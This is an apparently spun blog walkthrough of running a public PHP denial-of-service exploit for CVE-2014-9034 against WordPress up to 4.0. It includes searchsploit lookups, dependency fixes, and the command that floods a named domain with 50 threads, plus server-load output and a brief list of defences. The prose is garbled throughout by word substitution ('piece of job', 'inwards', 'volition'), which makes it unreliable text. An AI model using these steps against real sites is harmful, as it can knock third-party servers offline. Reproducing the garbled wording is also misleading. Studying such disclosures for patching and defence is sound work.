Proof of Concept PHP exploit for WordPress DoS Attack CVE-2014-9034 worked similar a charm on my ain WordPress website. Surprisingly, CVE-2014-9034 was published for sometime too it seems WordPress nevertheless hasn’t fixed this issue. I volition explicate how to piece of job this Proof of Concept tool too examination your ain WordPress website for vulnerabilities.
WordPress DoS Attack – CVE-2014-9034
Credit for WordPress DoS Attack (Denial of Service Proof of Concept PHP Exploit CVE-2014-9034: WordPress <=4.0) goes to John from http://secureli.com. I volition explicate how to piece of job this Proof of Concept tool too examination your ain WordPress website for vulnerability.
Searching exploit using searchspoit
How many of you lot used searchsploit inwards Kali Linux? It’s a prissy tool that updates too downloads exploits often. I piece of job it quite extensively along amongst MetaSploit.
Use searchsploit to search specific exploits. You tin piece of job it similar this:
root@kali: # searchsploit wordpress denial
---------------------------------------------|----------------------------------
Description | Path
---------------------------------------------|----------------------------------
WordPress <=4.0 Denial of Service Exploit | /php/webapps/35413.php
Wordpress < 4.0.1 - Denial of Service | /php/webapps/35414.txt
---------------------------------------------|----------------------------------
root@kali: #
Just inwards illustration you lot desire to search something else, you lot -h too it shows the assistance menu. Now assistance yourself to abide by to a greater extent than vulnerabilities.
root@kali: # searchsploit -h
Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
=========
OPTIONS
=========
-c - Perform case-sensitive searches; past times default,
searches volition endeavour to move greedy
-v - By setting verbose output, description lines
are allowed to overflow their columns
-h, --help - Show assistance screen
NOTES:
- Use whatever number of search price you lot would similar (minimum: 1)
- Search price are non illustration sensitive, too guild is irrelevant
root@kali: #
Using searchsploit results
searchsploit files are located at /usr/share/exploitdb/ folder. You ask to re-create the exploit file to your domicile directory or something similar.
root@kali: # mkdir bmo
root@kali: # cd bmo/
root@kali: /bmo#
root@kali: /bmo# cp /usr/share/exploitdb/platforms/php/webapps/35413.php .
root@kali: /bmo#
root@kali: /bmo#
Running the exploit
To run this script you lot ask to piece of job PHP command… Here’s the footling assistance menu:
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed past times john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
First fourth dimension I tried to run this php exploit, I received an error
root@kali: /bmo# php 35413.php somesrandomsite.com admin 50
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed past times john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
Sending POST information (username: admin; threads: 50) to somerandomsite.comPHP Fatal error: Call to undefined business office curl_multi_init() inwards /root/wp/35413.php on draw of piece of job 12
This is because a bundle is missing inwards my Kali Linux. I ask to install php5-curl bundle for that.
root@kali: /bmo# apt-get install php5-curl
Reading bundle lists... Done
Building dependency tree
Reading the world information... Done
The next NEW packages volition move installed:
php5-curl
0 upgraded, 1 newly installed, 0 to take away too 0 non upgraded.
Need to larn 29.4 kB of archives.
After this operation, 116 kB of additional disk infinite volition move used.
Get:1 http://security.kali.org/kali-security/ kali/updates/main php5-curl amd64 5.4.36-0+deb7u1 [29.4 kB]
Fetched 29.4 kB inwards 1s (18.8 kB/s)
Selecting previously unselected bundle php5-curl.
(Reading database ... 389427 files too directories currently installed.)
Unpacking php5-curl (from .../php5-curl_5.4.36-0+deb7u1_amd64.deb) ...
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading spider web server config: apache2 non running.
Setting upward php5-curl (5.4.36-0+deb7u1) ...
Creating config file /etc/php5/mods-available/curl.ini amongst novel version
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading spider web server config: apache2 non running.
root@kali: /bmo#
Now retry running this exploit:
root@kali: /bmo# php 35413.php somerandomsite.com admin 50
CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed past times john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50
Sending POST information (username: admin; threads: 50) to somerandomsite.com^C
root@kali: /bmo#
Server side experience
So this is what server side looks like
someuser@someserver [/home]# pstree
init─┬─/usr/local/cpan
├─httpd─┬─167*[httpd]
├─postgresql──238*
├─named───3*[{named}]
├─rsyslogd───3*[{rsyslogd}]
├─sshd───sshd───bash───pstree
httpd condition before
Server Built: November 17 2014 14:25:08
__________________________________________________________________
Current Time: Thursday, 08-Jan-2015 17:06:52 GMT
Restart Time: Thursday, 08-Jan-2015 16:13:46 GMT
Parent Server Generation: 0
Server uptime: 53 minutes six seconds
Total accesses: 6353 - Total Traffic: 26.9 MB
CPU Usage: u89.86 s19.17 cu0 cs0 - 3.42% CPU load
1.99 requests/sec - 8.7 kB/second - 4446 B/request
1 requests currently beingness processed, nine idle workers
___W___.._...._.._..............................................
................................................................
................................................................
................................................................
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot amongst no electrical flow process
httpd condition after
Server Built: November 17 2014 14:25:08
__________________________________________________________________
Current Time: Thursday, 08-Jan-2015 17:08:51 GMT
Restart Time: Thursday, 08-Jan-2015 17:08:26 GMT
Parent Server Generation: 0
Server uptime: 25 seconds
Total accesses: 334 - Total Traffic: 64 GB
CPU Usage: u1.85 s.33 cu0 cs0 - 8.72% CPU load
1.36 requests/sec - 2621 B/second - 1927 B/request
251 requests currently beingness processed, 12 idle workers
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW____....__..C
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW....WWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW..WWWWWWW....
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW.............
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot amongst no electrical flow process
Visible inwards my monitoring
So how does it expect inwards my Munin monitoring? Well, pretty f’ed up. I got massive spikes all over the place
Defending against these attacks
Followings are your options:
- The best means is to throttle wp-admin folder to specific IP’s.
- Throttle connection’s per IP.
- Use a WAF.
- Write your ain ModSecurity code inwards Apache or similar inwards NGINX (actually it would move prissy to encounter how NGINX industrial plant against such attacks, whatever takers?).
- Keep WordPress updated.
Conclusion
All inwards all, its a prissy exploit too it does what it’s supposed to do, hit massive connections too mysql charge for a server. Run it few minutes too if the server is non throttling connections per IP, it volition brand the server unresponsive.
Here is John’s master postal service http://secureli.com/2014/11/28/wordpress40-denialofservice-proofofconcept/ most this exploit too I intend WordPress should hit it ASAP.
Following explanation is taken from John’s site”
CVE-2014-9034 was published recently, highlighting an number that “allows remote attackers to campaign a denial of service (CPU consumption) via a long password that is improperly handled during hashing” due to phpass usage.
The total vulnerability information is available from:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034
- http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
- https://wpvulndb.com/vulnerabilities/7681
This exploit uses a denial of service laid on against wp-includes/class-phpass.php inwards the next WP versions:
- before 3.7.5
- 3.8.x earlier 3.8.5
- 3.9.x earlier 3.9.3
- 4.x earlier 4.0.1
This is the offset exploit against such laid on too thank you lot to John for bringing it to our attention. Enjoy too ensure your website is protected against such attacks. Share too RT.
